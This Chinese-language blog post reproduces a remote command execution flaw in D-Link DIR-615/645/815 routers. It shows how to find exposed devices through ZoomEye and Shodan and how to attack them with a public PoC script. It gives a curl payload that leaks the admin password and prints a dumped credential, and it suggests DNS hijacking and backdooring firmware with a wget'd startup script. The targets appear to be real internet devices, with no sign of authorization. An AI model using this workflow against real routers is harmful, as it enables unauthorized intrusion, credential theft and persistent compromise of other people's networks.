Zhouyao's Blog

Do Something Big With Us

D-Link service.cgi远程命令执行漏洞复现

1.1 概述

友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家。

1月17日,CNVD公开了D-LinkDIR 615/645/815 service.cgi远程命令执行漏洞(CNVD-2018-01084)。由于笔者近期对网络设备进行渗透技术略有研究,便复现了一下该漏洞。

1.2 漏洞描述

D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞是由于service.cgi中拼接了HTTP POST请求中的数据,造成后台命令拼接,导致可执行任意命令。

1.3 影响版本

D-Link DIR 615

D-Link DIR 645

D-Link DIR 815

1.4 复现材料

网络空间搜索引擎:ZoomEye

漏洞利用POC:https://github.com/Cr0n1c/dlink_shell_poc/blob/master/dlink_auth_rce

1.5 复现步骤

1、使用ZoomEye(钟馗之眼)对影响版本网络设备进行搜索。

什么是钟馗之眼Shodan?有翻墙能力的最好去Wiki看一下。

app:”D-Link DIR-645 WAP http config”

《D-Link service.cgi远程命令执行漏洞复现》

当然使用Shodan也是可以的

《D-Link service.cgi远程命令执行漏洞复现》

2、搜索出相应的网络设备。

《D-Link service.cgi远程命令执行漏洞复现》

3、启动D-Link脚本,脚本参数定义:

-h 帮助

-u输入攻击地址,格式为http://xx.xx.xx.xx:xxxx

-x开始攻击利用

-pD-Link密码,正常情况下,这个参数不需要输入

《D-Link service.cgi远程命令执行漏洞复现》

4、使用脚本对目标地址进行攻击

《D-Link service.cgi远程命令执行漏洞复现》

5、成功入侵,列出相关文件列表

 

《D-Link service.cgi远程命令执行漏洞复现》

Payload:

curl -d SERVICES=DEVICE.ACCOUNT http://<device ip>/getcfg.php

可以直接爆出管理员密码

<entry>
<uid>USR-</uid>
<name>admin</name>
<usrid></usrid>
<password>KU-820_FA(2015)</password>
<group>0</group>
<description></description>
</entry>

《D-Link service.cgi远程命令执行漏洞复现》

使用密码登录路由器,可以进行DNS劫持等行为。

还可以下载对应路由器版本固件,解压之后,修改相应的开机启动项,去wget脚本文件,这样后门就植入成功了。

《D-Link service.cgi远程命令执行漏洞复现》《D-Link service.cgi远程命令执行漏洞复现》

《D-Link service.cgi远程命令执行漏洞复现》

1.6 总结

笔者经过测试发现,仅D-Link DIR 645复现成功,并且该脚本还具有爆破D-Link DIR 645密码功能。

《D-Link service.cgi远程命令执行漏洞复现》

《D-Link service.cgi远程命令执行漏洞复现》

《D-Link service.cgi远程命令执行漏洞复现》

参考链接

  • http://www.s3cur1ty.de/m1adv2013-017
  • http://seclists.org/bugtraq/2013/Dec/11
  • http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf
  • https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt
点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

83 − 79 =